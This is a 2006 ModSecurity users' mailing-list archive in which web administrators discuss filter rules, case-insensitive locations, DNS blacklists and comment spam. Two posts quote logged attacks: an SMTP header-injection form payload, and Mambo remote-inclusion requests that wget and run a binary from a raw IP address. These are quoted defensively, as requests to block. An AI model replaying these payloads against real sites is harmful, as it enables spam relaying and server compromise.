mod-security-users — General discussion about mod_security

Re: [mod-security-users] LocationMatch

[Tom A. <tan...@oa...>]

Diego Pellegrino wrote:
> Ok,
> 
> I read LocationMatch documentation, but i couldn't find any easy and 
> practical way of write the location i tryied this way:
> 
> /pelo/
> 
> <LocationMatch /[pP][eE][lL][oO]/>
> secfilter hola
> </LocationMatch>
> 
> it works fine but it's not easy to write, anyone know a better way to do 
> this?

Try

RewriteRule /pelo/(.*) /pelo/$1 [NC]

or

Alias /PELO /pelo

or

AliasMatch /PELO/(.*) /pelo/$1

or

Redirect permanent /PELO http://mysite/pelo

Check out the mod_rewrite and mod_alias docs.

Tom

[mod-security-users] LocationMatch

[Diego P. <die...@ho...>]

Ok,

I read LocationMatch documentation, but i couldn't find any easy and 
practical way of write the location i tryied this way:

/pelo/

<LocationMatch /[pP][eE][lL][oO]/>
secfilter hola
</LocationMatch>

it works fine but it's not easy to write, anyone know a better way to do 
this?

thanks you

----- Original Message -----
From: "Ivan Ristic" <iv...@we...>
To: "Diego Pellegrino" <die...@ho...>
Cc: <mod...@li...>
Sent: Thursday, February 23, 2006 4:22 PM
Subject: Re: [mod-security-users] lowercase and uppercase


>Diego Pellegrino wrote:
>>I have the following question
>>
>>I am using mod_security acting as proxy with apache/linux the web server
>>is running on windows server.
>>
>>if i use directives like
>>
>></location /prueba/hola.html>
>>secfilter chau redirect:/pepe.html
>></localtion>
>>
>>when someone connect using
>>
>>http://mysite/prueba/hola.html?chau
>>
>>filter works fine.
>>
>>but if i make that request:
>>
>>http://mysite/PRUEBA/HOLA.html?chau the filter doesn't work because the
>>uppercase dosen't match with <location> directive.
>>
>>anyone know how to convert requests to lowercase or uppercase in an easy
>>way using mod_rewrite or something else?
>
>  Try LocationMatch:
>
>  http://httpd.apache.org/docs/2.2/mod/core.html#locationmatch.
>
>  Or use multiple ModSecurity rules, chained (once you make them work ;)
>
>--
>Ivan Ristic, Technical Director
>Thinking Stone, http://www.thinkingstone.com
>ModSecurity: Open source Web Application Firewall
>
>
>-------------------------------------------------------
>This SF.Net email is sponsored by xPML, a groundbreaking scripting language
>that extends applications into web and mobile media. Attend the live 
>webcast
>and join the prime developer group breaking into this new coding territory!
>http://sel.as-us.falkag.net/sel?cmd=lnk&kid=110944&bid=241720&dat=121642
>_______________________________________________
>mod-security-users mailing list
>mod...@li...
>https://lists.sourceforge.net/lists/listinfo/mod-security-users
>

Re: [mod-security-users] Ideas for future features..

[BassPlayer <bas...@an...>]

I'd love to be able to pipe content through dspam!
BP

Ivan Ristic wrote:
> Tom Anderson wrote:
>>
>> If I were running a blog or forum, I might pipe requests through
>> Bogofilter or another statistical filter in order to remove spam.
>
>   As a matter of fact, ModSecurity 1.8.x-dev was able to interface
>   with external spam checkers. I announced it on the list (I think)
>   but since no one used it I removed it prior to 1.9 final.
>
>   If there's interest it can go back. However, I certainly don't
>   have time to test the effectiveness of that approach.
>
> --
> Ivan Ristic, Technical Director
> Thinking Stone, http://www.thinkingstone.com
> ModSecurity: Open source Web Application Firewall
>
>
> -------------------------------------------------------
> This SF.Net email is sponsored by xPML, a groundbreaking scripting
> language
> that extends applications into web and mobile media. Attend the live
> webcast
> and join the prime developer group breaking into this new coding
> territory!
> http://sel.as-us.falkag.net/sel?cmd=lnk&kid=110944&bid=241720&dat=121642
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
>
> !DSPAM:43fe1549275342220012932!
>

Re: [mod-security-users] Ideas for future features..

[Tom A. <tan...@oa...>]

Ivan Ristic wrote:
>   As a matter of fact, ModSecurity 1.8.x-dev was able to interface
>   with external spam checkers. I announced it on the list (I think)
>   but since no one used it I removed it prior to 1.9 final.
> 
>   If there's interest it can go back. However, I certainly don't
>   have time to test the effectiveness of that approach.

Sounds interesting and worthwhile.  I'm not a candidate for testing it 
out right now, but maybe Zach Roberts would be interested.

Tom

Re: [mod-security-users] Re: What best to do with php, xmlrpc, cvs, mambo, blog, drupal, wordpress injection attacks?

[BassPlayer <bas...@an...>]

http://apachesecurity.net/

Great book

Re: [mod-security-users] Filter question

[Ivan R. <iv...@we...>]

Jim McCullars wrote:
>
> That has to be added to Apache, right?  The documentation page for
> 1.9.2 tells how to do this with apxs, but I don't use DSO.  Could the docs
> be updated to tell how to add this module to Apache as a static module?

  If someone tells me how it's done :) I've never tried to compile
  Apache 1.x statically with PCRE.


> There are some caveats as to the ordering of modules in Apache, and this
> is a topic that I have never fully understood.

  You can always reorder them at runtime...

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

Re: [mod-security-users] Ideas for future features..

[Ivan R. <iv...@we...>]

Tom Anderson wrote:
>
> If I were running a blog or forum, I might pipe requests through
> Bogofilter or another statistical filter in order to remove spam.

  As a matter of fact, ModSecurity 1.8.x-dev was able to interface
  with external spam checkers. I announced it on the list (I think)
  but since no one used it I removed it prior to 1.9 final.

  If there's interest it can go back. However, I certainly don't
  have time to test the effectiveness of that approach.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

Re: [mod-security-users] lowercase and uppercase

[Ivan R. <iv...@we...>]

Diego Pellegrino wrote:
> I have the following question
> 
> I am using mod_security acting as proxy with apache/linux the web server
> is running on windows server.
> 
> if i use directives like
> 
> </location /prueba/hola.html>
> secfilter chau redirect:/pepe.html
> </localtion>
> 
> when someone connect using
> 
> http://mysite/prueba/hola.html?chau
> 
> filter works fine.
> 
> but if i make that request:
> 
> http://mysite/PRUEBA/HOLA.html?chau the filter doesn't work because the
> uppercase dosen't match with <location> directive.
> 
> anyone know how to convert requests to lowercase or uppercase in an easy
> way using mod_rewrite or something else?

  Try LocationMatch:

  http://httpd.apache.org/docs/2.2/mod/core.html#locationmatch.

  Or use multiple ModSecurity rules, chained (once you make them work ;)

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

Re: [mod-security-users] Ideas for future features..

[Ivan R. <iv...@we...>]

Zach Roberts wrote:
>
> The problem is that the idea of using flatfiles for a blacklist cannot
> possibly be sustained indefinitely as more of this comment spam
> surfaces. Even blocking the robots by IPs will be nearly impossible
> using firewalls or flatfiles as even firewalls will start to slow down
> servers after tens of thousands of IPs are added.

  That's a problem because these devices are rule-based and they
  need to be processed sequentially.

  Some news: the 2.0.0 code in the CVS supports blacklisting on the
  Apache level. The IP addresses are stored in a SDBM database and
  only one lookup is needed per request to establish whether it is
  blacklisted or not.

  There is also a new action - "blockip:DURATION". This may not be
  very useful at the moment but:

  1. 2.0.0 will also add a rating mechanism, similar to that used
     by spam filters.

  2. I want to enable ModSecurity to keep track of IP, user, session,
     and address ratings.

  So, for example, if you get too many hits from the same IP address
  you can choose to block it for a while.

  OK, now back to the original proposal. There are two ways to approach
  it:

  1. At the moment the database contains only the blacklisted
     addresses. It is possible to start caching clean IP addresses.
     That would replace one or multiple DNS resolution attempts with
     a single lookup.

  2. ModSecurity v2.0.0 is also likely to have an API (web-based)
     to allow IP addresses to be added and removed from the list.
     An external tool could be used to add/remove the IP addresses.


> Blar's mod_access_rbl was one attempt at this but, the results aren't
> cached so it isn't very efficient.

  This is v1 above - it's pretty trivial to add to ModSecurity.


> A rule such as..
> 
> SecFilterSelective "ARG_url" "^(http|https):/"
> lookup:combined.surbl.org,denyonfail

  What would the above lookup? The contents of paramter "url"?
  Perhaps it is a better idea to use regex backreferences for
  this...


> Even a way of mod_security extracting the domain from the arguement and
> then passing it to the surbl would be even better.

  Right, backreferences.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

[mod-security-users] lowercase and uppercase

[Diego P. <die...@ho...>]

I have the following question

I am using mod_security acting as proxy with apache/linux the web server is 
running on windows server.

if i use directives like

</location /prueba/hola.html>
secfilter chau redirect:/pepe.html
</localtion>

when someone connect using

http://mysite/prueba/hola.html?chau

filter works fine.

but if i make that request:

http://mysite/PRUEBA/HOLA.html?chau the filter doesn't work because the 
uppercase dosen't match with <location> directive.

anyone know how to convert requests to lowercase or uppercase in an easy way 
using mod_rewrite or something else?

Thanks you

Re: [mod-security-users] chain

[Ivan R. <iv...@we...>]

Diego Pellegrino wrote:
> Hi
> 
> I tryied to make the following rule
> 
> SecFilter mariela chain,id:1009,log,redirect:/pepe.html
> SecFilter jose

  This works for me in 1.9.2. Which version are you using? There
  was a bug in 1.9 related to chain. You may be hitting that.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

[mod-security-users] chain

[Diego P. <die...@ho...>]

Hi

I tryied to make the following rule

SecFilter mariela chain,id:1009,log,redirect:/pepe.html
SecFilter jose

but the chain directive has no effect.

if i use this filter

SecFilter mariela chain,id:1009,log
SecFilter jose


chain directive works fine, Why?

Thanks you.

Re: [mod-security-users] Ideas for future features..

[Jason E. <jed...@ca...>]

Zach Roberts wrote:
> I know at least a few of us that use mod_security to enhance security 
> in a shared webhosting environment have tried to tackle the problem of 
> comment spam. The idea of using mod_security rules to block it isn't 
> new. See gotroot.com's blacklist.conf for their attempt at it.
>
> The problem is that the idea of using flatfiles for a blacklist cannot 
> possibly be sustained indefinitely as more of this comment spam 
> surfaces. Even blocking the robots by IPs will be nearly impossible 
> using firewalls or flatfiles as even firewalls will start to slow down 
> servers after tens of thousands of IPs are added.
I haven't encountered the problem of too many blacklisted IP's yet. For 
that problem, we may want a non-flat-file option such as berkely db, 
sqlite or something similar. Even sendmail compiles it's aliases file.

The thing I have noticed is that there is no way to reload the file 
besides restarting apache. If you don't have firewall access and block 
Ip's using mod_security (which I don't), it would be nice to be able 
have the file reloaded periodically. something like check for an updated 
file every 5 minutes (configurable).
> The current solutions for blogs such as WordPress involve running a 
> PHP script that accesses MySQL for each attempt and then blocking it 
> based on certain criteria. While it works for now I would hate to see 
> the day when this type of spam is as common as email spam getting ten 
> attempts per second while attempting to run PHP and MySQL.
Wordpress already does with by using a plugin called Spam Karma.
> In my opinion what is needed is support for dnsbl type blacklists. 
> Blar's mod_access_rbl was one attempt at this but, the results aren't 
> cached so it isn't very efficient.
>
> A rule such as..
>
> SecFilterSelective "ARG_url" "^(http|https):/" 
> lookup:combined.surbl.org,denyonfail
>
> Even a way of mod_security extracting the domain from the arguement 
> and then passing it to the surbl would be even better.
>
> Another rule might be..
>
> SecFilterSelective REMOTE_ADDR "regex_to_check_valid_ip" 
> lookup:sbl-xbl.spamhaus.org,denyonfail
>
> I think you can see where I'm going with this.
DNS lookups can drastically affect the performance of your server. It 
may take one second or longer to do the first lookup for an IP. The 
latency is noticeable. I use blacklists, but only on post requests or 
after the request has been served. I have a cron job than runs every 
minute and uses the blacklist utility from http://www.apachesecurity.net 
to block IP's on the DNS blacklists among other things. the blacklist 
utility keeps my blocklist from growing too large by expiring the 
entries. The other concern is that waiting on a DNS lookup before 
serving a request leaves you more open to an DoS attack.

It would be nice if mod_security had this, but I would be very careful 
about implementing it.


Jason Edgecombe

Re: [mod-security-users] Filter question

[Jim M. <ji...@ww...>]

On Thu, 23 Feb 2006, Ivan Ristic wrote:

>   I think this is because the regex library used by Apache (and thus
>   used by ModSecurity) is not very capable - it does not understand "\n".

   Oops.  Now, here's something kind of funny.  I had noticed that
sometimes the pattern worked and sometimes it didn't.  Looking closer, I
finally noticed that the only time it worked was when the last character
in the previous line was an "n" (because [[:space:]] matches the newline).
D'oh!

>   Note that it is possible (and recommended) to compile ModSecurity
>   with PCRE (http://www.pcre.org) and thus work with a much better
>   regex library (not to mention the performance increase).

   That has to be added to Apache, right?  The documentation page for
1.9.2 tells how to do this with apxs, but I don't use DSO.  Could the docs
be updated to tell how to add this module to Apache as a static module?
There are some caveats as to the ordering of modules in Apache, and this
is a topic that I have never fully understood.

   Thanks for the "\x0a" trick - I just hooked one!  :-)

Jim McCullars
University of Alabama in Huntsville

Re: [mod-security-users] mod_security Apache 1.3.x and 2.2.x support

[Ivan R. <iv...@we...>]

JupiterHost.Net wrote:
> Hello,
> 
> Sorry for the newbie post (*again* ;p I meant mod_security not mod_mono
> ...) but I'm finding conflicting data (or no data ;p) about this (I'm
> trying to RTFM and STFW but swimming in a sea of cluelessness)
> 
> a) Will mod_mono work on Apache 1.3.x and Apache 2.2.x ?

  mod_security, yes...


> b) Where is each one documented specifically?

  In the manual?

  http://www.modsecurity.org/documentation/modsecurity-apache-manual-1.9.2.html


> c) What url has the documentation about building it into Apache 1.3.x
> and 2.2.x (static or DSO is fine)

  See above.

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

Re: [mod-security-users] mod_security Apache 1.3.x and 2.2.x support

[JupiterHost.Net <ml...@ju...>]

JupiterHost.Net wrote:

> Hello,
> 
> Sorry for the newbie post (*again* ;p I meant mod_security not mod_mono 
> ...) but I'm finding conflicting data (or no data ;p) about this (I'm 
> trying to RTFM and STFW but swimming in a sea of cluelessness)
> 
> a) Will mod_mono work on Apache 1.3.x and Apache 2.2.x ?

Er, make that mod_security (sorry for goofing that up ;P)

> b) Where is each one documented specifically?
> 
> c) What url has the documentation about building it into Apache 1.3.x 
> and 2.2.x (static or DSO is fine)
> 
> TIA!

Re: [mod-security-users] mod_mono Apache 1.3.x and 2.2.x support

[JupiterHost.Net <ml...@ju...>]

Sheesh, I meant mod_security not mod_mono, sorry :)

I did a new post reflecting that, apologies

JupiterHost.Net wrote:

> Hello,
> 
> Sorry for the newbie post but I'm finding conflicting data (or no data 
> ;p) about this (I'm trying to RTFM and STFW but swimming in a sea of 
> cluelessness)
> 
> a) Will mod_mono work on Apache 1.3.x and Apache 2.2.x ?
> 
> b) Where is each one documented specifically?
> 
> c) What url has the documentation about building it into Apache 1.3.x 
> and 2.2.x (static or DSO is fine)
> 
> TIA!
> 
> 
> -------------------------------------------------------
> This SF.Net email is sponsored by xPML, a groundbreaking scripting language
> that extends applications into web and mobile media. Attend the live 
> webcast
> and join the prime developer group breaking into this new coding territory!
> http://sel.as-us.falkag.net/sel?cmd=lnk&kid=110944&bid=241720&dat=121642
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> 
> 
> 

[mod-security-users] mod_security Apache 1.3.x and 2.2.x support

[JupiterHost.Net <ml...@ju...>]

Hello,

Sorry for the newbie post (*again* ;p I meant mod_security not mod_mono 
...) but I'm finding conflicting data (or no data ;p) about this (I'm 
trying to RTFM and STFW but swimming in a sea of cluelessness)

a) Will mod_mono work on Apache 1.3.x and Apache 2.2.x ?

b) Where is each one documented specifically?

c) What url has the documentation about building it into Apache 1.3.x 
and 2.2.x (static or DSO is fine)

TIA!

Re: [mod-security-users] Filter question

[Ivan R. <iv...@we...>]

Jim McCullars wrote:
> I'm running mod_security 1.9.2
> under Apache 1.3.34 and here is the complete config:
>
> ...
> 
> SecFilterSelective SCRIPT_FILENAME "formmail\.pl" skip
> SecFilterSelective ARGS_VALUES "\n[[:space:]]*(to|bcc|cc)[[:space:]]*:.*@"
> SecFilterSelective SCRIPT_FILENAME "contactus\.php" "auditlog,pass"
>
> ...
>
> Note that part of the request reads, "%0Abcc%3A+StarlaK8099%40aol.com", so
> why didn't the second rule block the request?  Not sure what I'm doing
> wrong here.  Thanks...

  I think this is because the regex library used by Apache (and thus
  used by ModSecurity) is not very capable - it does not understand "\n".

  I tried replacing "\n" with \x0a (this is a ModSecurity extension)
  and with "[[:cntrl:]]". Both worked.

  Note that it is possible (and recommended) to compile ModSecurity
  with PCRE (http://www.pcre.org) and thus work with a much better
  regex library (not to mention the performance increase).

-- 
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall

[mod-security-users] mod_mono Apache 1.3.x and 2.2.x support

[JupiterHost.Net <ml...@ju...>]

Hello,

Sorry for the newbie post but I'm finding conflicting data (or no data 
;p) about this (I'm trying to RTFM and STFW but swimming in a sea of 
cluelessness)

a) Will mod_mono work on Apache 1.3.x and Apache 2.2.x ?

b) Where is each one documented specifically?

c) What url has the documentation about building it into Apache 1.3.x 
and 2.2.x (static or DSO is fine)

TIA!

Re: [mod-security-users] What best to do with php, xmlrpc, cvs, mambo, blog, drupal, wordpress injection attacks?

[BassPlayer <bas...@an...>]

I use snort and a modified guardian script to inteligently block src addrs
that are generating alerts to my protected nets and DMZ. The script will
block the src addrs for a user defined time and send me a mail like.

SID: http://www.snort.org/pub-bin/sigs.cgi?sid=1:3827
Alert: WEB-PHP xmlrpc.php post attempt [Classification: Web Application
Attack]
[Priority: 1]
Source: 201.58.125.167
Destination: x.x.x.x
Action: Block

This has cut down on the bandwidth use by attacks.

[mod-security-users] Filter question

[Jim M. <ji...@ww...>]

Hi, I am semi-new (just over a week) user to mod_security, having
installed it when a bad PHP script on our web server was used to spam
hundreds of AOL users.  It's done a fine job of blocking further attempts
to abuse PHP.

The script that the attackers used was called contactus.php and they used
SMTP header injection to do the spam.  I noticed that when I first
installed mod_security, it blocked a lot of attempts, but I have seen very
little activity in the audit log since.  But the Apache log shows that the
script is still being called.  So I decided to log all calls to
contactus.php to see what was happening.  I'm running mod_security 1.9.2
under Apache 1.3.34 and here is the complete config:

<ifModule mod_security.c>
    # Turn the filtering engine On or Off
    SecFilterEngine On

    # Make sure that URL encoding is valid
    SecFilterCheckURLEncoding On

    # Unicode encoding check
    SecFilterCheckUnicodeEncoding Off

    # Only allow bytes from this range
    SecFilterForceByteRange 0 255

    # Only log suspicious requests
    SecAuditEngine RelevantOnly

    # The name of the audit log file
    SecAuditLog logs/audit_log
    # Debug level set to a minimum
    SecFilterDebugLog logs/modsec_debug_log
    SecFilterDebugLevel 0

    # Should mod_security inspect POST payloads
    SecFilterScanPOST On

    # By default log and deny suspicious requests
    # with HTTP status 500
    SecFilterDefaultAction "deny,log,status:500"
#
# rules
#
# filter out SMTP injection attempts to exploit badly-written PHP scripts
# skip the check if the script is formmail.pl

SecFilterSelective SCRIPT_FILENAME "formmail\.pl" skip
SecFilterSelective ARGS_VALUES "\n[[:space:]]*(to|bcc|cc)[[:space:]]*:.*@"
SecFilterSelective SCRIPT_FILENAME "contactus\.php" "auditlog,pass"

</IfModule>


I added the third rule this morning to try and log calls to contactus.php
that do not get blocked by the second rule.  Here is a log entry:

==00004f90==============================
Request: lib.uah.edu 211.220.247.254 - - [23/Feb/2006:09:49:32 -0600]
"POST /contactus.php HTTP/1.1" 200 16163 "http://lib.uah.edu/" "-" - "-"
----------------------------------------
POST /contactus.php HTTP/1.1
Connection: Keep-Alive, Close
Content-Length: 773
Content-Type: application/x-www-form-urlencoded
Host: lib.uah.edu
Referer: http://lib.uah.edu/
mod_security-message: Warning. Pattern match "contactus\\.php" at
SCRIPT_FILENAME

773
esh_formmail_recipient=where7087%40lib.uah.edu&esh_formmail_cc=th%0D%0AContent-Type%3A+multipart%2Falternative%3B+boundary%3D1bcca4044c1101318a576bbebb0fdef3%0AMIME-Version%3A+1.0%0ASubject%3A+whose+rank+they+can+borrow%0Abcc%3A+StarlaK8099%40aol.com%0A%0AThis+is+a+multi-part+message+in+MIME+format.%0A%0A--1bcca4044c1101318a576bbebb0fdef3%0AContent-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Version%3A+1.0%0AContent-Transfer-Encoding%3A+7bit%0A%0Adance+and+she+fell+dead+to+the+earth+uthor+s+ote+n+hiele+s+anish+opular+radition+it+is+related+that+she+was+one+argrethe+kofgaard%0A--1bcca4044c1101318a576bbebb0fdef3--%0A%0D%0A.%0D%0A&formmail_submit=where7087%40lib.uah.edu&esh_formmail_bcc=where7087%40lib.uah.edu&esh_formmail_subject=where7087%40lib.uah.edu

HTTP/1.1 200 OK
X-Powered-By: PHP/4.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
--00004f90--

Note that part of the request reads, "%0Abcc%3A+StarlaK8099%40aol.com", so
why didn't the second rule block the request?  Not sure what I'm doing
wrong here.  Thanks...

Jim McCullars
University of Alabama in Huntsville

RE: [mod-security-users] What best to do with php, xmlrpc, cvs, mambo, blog, drupal, wordpress injection attacks?

[<Ral...@it...>]

Hi Andrej,

thank you for your thoughts.

luckily the webapps don't run PHP.
That's why there isn't even a mod_php or external PHP interpreter
present.

Also user agents such as wget aren't installed.
And I seriously consider removing all of Perl
(though no Perl CGIs nor mod_perl code is part of the webapp)
Still there seem to be some system tasks that rely on the
presence of Perl
but I think on a bastion host nothing more than what is exactly
needed for its service
should exist there.

What still troubles me is the Java stuff
that I will be forced to install
because I know too little of Java=20
to be alerted about security issues and exploits in that field.

But weren't it the Java folks who once boasted about their new
cool language
that a prominent design feature was its sandboxing?

I'll have to educate myself with Java and Tomcat and mod_jk...


> -----Original Message-----
> From: mod...@li...=20
> [mailto:mod...@li...]On=20
> Behalf Of Andras Got
> Sent: Thursday, February 23, 2006 2:43 PM
> To: mod...@li...
> Subject: Re: [mod-security-users] What best to do with php,=20
> xmlrpc, cvs, mambo, blog, drupal, wordpress injection attacks?
>=20
>=20
> Hi,
>=20
> Just ban wget, fetch and other dl clients, suspicious name is=20
> URL-s and of course you should secure=20
> your PHP (safe_mode, disable_functions, open_basedir).
>=20
> For xmlrpc you may filter on the post payload, i'm not=20
> familiar with that security flaw.
>=20
> IMHO you should give them a 404 and nothing more. I think the=20
> a best defense is showing them that=20
> there's nothing to exploit. When too many of these actions=20
> come to your webserver you may DoS the=20
> system you're redirecting to and giving a new target as well.
>=20
> You may write letters to the abuse addresses of the network=20
> admins, because these are zombie=20
> machines almost everytime. On my webserver i got them coming=20
> from 3000-5000 addresses, but they're=20
> referer spams. I redirect them to localhost (to their=20
> localhost) with mod_rewrite. :)
>=20
> Computer users tend to be very ignorant about security flaws=20
> lately, so there's no much we can do,=20
> besides a 404. :(
>=20
> Regards,
> Andrej
>=20
>=20
> Ral...@it... wrote:
> > Hello,
> >=20
> > I guess evil noise like that is mundane encounter to any WWW
> > webserver admin
> > and probably an unavoidable plague as is SPAM for SMTP
relays.
> >=20
> > Because I haven't administered a WWW servicing webserver yet
> > I luckily have missed such filth so far.
> >=20
> > Of course these requests aren't serviced by our webserver and
> > mod_security dutifully
> > sends them a 404,
> > nevertheless they waste bandwidth, file system space for
their
> > logging and processing resources.
> >=20
> > On the other hand I'am hesitant to drop those source IP
addresses
> > by my packet filter
> > because I suspect them (if not spoofed) to originate from an
> > ISP's dynamic IP pool,
> > and thereby blocking the next unlucky decent guy who happens
have
> > temporarily assigned such
> > an abused IP address.
> >=20
> > So I would like to ask you seasoned webserver admins how best
to
> > handle these requests?
> >=20
> > Do you simply drop them,
> > or do you redirect them to sites e.g. such as
> > http://www.gulli.com/ ,
> > or some CERT blacklist etc.?
> >=20
> > As for mod_security,
> > what would a neat filter look like to counter or trick them?
> > Is the setup of a honeypod that would draw attention from the
> > webserver advisable,
> > or is such in vain?
> >=20
> > Here's an excerpt from our access_log of requests trying to
wget
> > and run some hostile code
> > through our webserver.
> > As these reappear on a regular basis
> > I assume that some attack kits that generate them are in
> > widespread use.
> >=20
> >=20
> > 203.221.23.212 - - [23/Feb/2006:03:56:54 +0100] "GET
> > /index2.php?option=3Dcom_content&do_pdf=3D1&id=3D1index2
> >
.php?_REQUEST[option]=3Dcom_content&_REQUEST[Itemid]=3D1&GLOBALS=3D&mos
> > Config_absolute_path=3Dhttp://209.123.16
> >
.34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.123.16.34/gicumz;chmod%2074
> > 4%20gicumz;./gicumz;echo%20YYY;echo| =20
> > HTTP/1.1" 404 208
> > 203.221.23.212 - - [23/Feb/2006:03:56:55 +0100] "GET
> > /index.php?option=3Dcom_content&do_pdf=3D1&id=3D1index2.
> >
php?_REQUEST[option]=3Dcom_content&_REQUEST[Itemid]=3D1&GLOBALS=3D&mosC
> > onfig_absolute_path=3Dhttp://209.123.16.
> >
34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744
> > %20gicumz;./gicumz;echo%20YYY;echo|  H
> > TTP/1.1" 404 207
> > 203.221.23.212 - - [23/Feb/2006:03:56:57 +0100] "GET
> > /mambo/index2.php?_REQUEST[option]=3Dcom_content&_RE
> >
QUEST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.123.1
> > 6.34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209
> >
.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|
> > HTTP/1.1" 404 214
> > 203.221.23.212 - - [23/Feb/2006:03:56:58 +0100] "GET
> > /cvs/index2.php?_REQUEST[option]=3Dcom_content&_REQU
> >
EST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.123.16.
> > 34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.1
> >
23.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|
> > HTTP/1.1" 404 212
> > 203.221.23.212 - - [23/Feb/2006:03:56:59 +0100] "GET
> > /articles/mambo/index2.php?_REQUEST[option]=3Dcom_co
> >
ntent&_REQUEST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://
> > 209.123.16.34/cmd.gif?&cmd=3Dcd%20/tmp;w
> >
get%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20Y
> > YY;echo|  HTTP/1.1" 404 223
> > 203.221.23.212 - - [23/Feb/2006:03:57:01 +0100] "GET
> > /cvs/mambo/index2.php?_REQUEST[option]=3Dcom_content
> >
&_REQUEST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.1
> > 23.16.34/cmd.gif?&cmd=3Dcd%20/tmp;wget%2
> >
0209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;ec
> > ho|  HTTP/1.1" 404 218
> > 203.221.23.212 - - [23/Feb/2006:03:57:02 +0100] "POST
/xmlrpc.php
> > HTTP/1.1" 403 212
> > 203.221.23.212 - - [23/Feb/2006:03:57:03 +0100] "POST
> > /blog/xmlrpc.php HTTP/1.1" 403 217
> > 203.221.23.212 - - [23/Feb/2006:03:57:05 +0100] "POST
> > /blog/xmlsrv/xmlrpc.php HTTP/1.1" 403 224
> > 203.221.23.212 - - [23/Feb/2006:03:57:06 +0100] "POST
> > /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 403 225
> > 203.221.23.212 - - [23/Feb/2006:03:57:07 +0100] "POST
> > /drupal/xmlrpc.php HTTP/1.1" 403 219
> > 203.221.23.212 - - [23/Feb/2006:03:57:09 +0100] "POST
> > /phpgroupware/xmlrpc.php HTTP/1.1" 403 225
> > 203.221.23.212 - - [23/Feb/2006:03:57:10 +0100] "POST
> > /wordpress/xmlrpc.php HTTP/1.1" 403 222
> > 203.221.23.212 - - [23/Feb/2006:03:57:11 +0100] "POST
/xmlrpc.php
> > HTTP/1.1" 403 212
> > 203.221.23.212 - - [23/Feb/2006:03:57:13 +0100] "POST
> > /xmlrpc/xmlrpc.php HTTP/1.1" 403 219
> > 203.221.23.212 - - [23/Feb/2006:03:57:14 +0100] "POST
> > /xmlsrv/xmlrpc.php HTTP/1.1" 403 219
> >=20
> >=20
> >=20
> > -------------------------------------------------------
> > This SF.Net email is sponsored by xPML, a groundbreaking=20
> scripting language
> > that extends applications into web and mobile media. Attend=20
> the live webcast
> > and join the prime developer group breaking into this new=20
> coding territory!
> >
http://sel.as-us.falkag.net/sel?cmd=3Dk&kid=110944&bid$1720&dat=121642
> > _______________________________________________
> > mod-security-users mailing list
> > mod...@li...
> >
https://lists.sourceforge.net/lists/listinfo/mod-security-users
> >=20
>=20
>=20
> -------------------------------------------------------
> This SF.Net email is sponsored by xPML, a groundbreaking=20
> scripting language
> that extends applications into web and mobile media. Attend=20
> the live webcast
> and join the prime developer group breaking into this new=20
> coding territory!
> http://sel.as-us.falkag.net/sel?cmd=3Dlnk&kid=3D110944&bid=3D241720&
dat=3D121642
_______________________________________________
mod-security-users mailing list
mod...@li...
https://lists.sourceforge.net/lists/listinfo/mod-security-users

Re: [mod-security-users] Ideas for future features..

[Tom A. <tan...@oa...>]

Zach Roberts wrote:
> I know at least a few of us that use mod_security to enhance security in 
> a shared webhosting environment have tried to tackle the problem of 
> comment spam. The idea of using mod_security rules to block it isn't 
> new. See gotroot.com's blacklist.conf for their attempt at it.
...
> In my opinion what is needed is support for dnsbl type blacklists. 
> Blar's mod_access_rbl was one attempt at this but, the results aren't 
> cached so it isn't very efficient.

If I were running a blog or forum, I might pipe requests through 
Bogofilter or another statistical filter in order to remove spam.  That 
would be more effective than playing cat and mouse with IP addresses. 
I'd put an admin-only button on my software to allow me to flag a post 
as spam, thus training the filter with it.  Questionable or "unsure" 
posts would go into a non-public holding list which could then be 
approved manually, and upon doing so, train the filter with them.

On my mail server, DNSBLs remove maybe half of all incoming spam. 
That's great and efficient, but not enough.  The rest, up to about 
99.9%, is removed through Bogofilter and a few helper scripts that do 
things like tag the email with the ASN of the sender and run any links 
through URLBLs, tagging the email with a token if they match.  Out of 
thousands of spams per week, I only receive 1-2 false negatives and 
about 3-4 unsures, with no false positives.  I'm sure very similar 
measures could be employed to quash comment spam.

Trying to do it with mod_security is probably going to be about as 
effective as filtering email with procmail.  It looks like a good idea 
at first, and even works a little bit, but quickly becomes unmanageable 
and ineffective.

Tom

[mod-security-users] Re: What best to do with php, xmlrpc, cvs, mambo, blog, drupal, wordpress injection attacks?

[John T. <gma...@jt...>]

Andras Got wrote:

> Just ban wget, fetch and other dl clients, suspicious name is URL-s and 

Apologies for my ignorance, but does this mean you add lines to the conf 
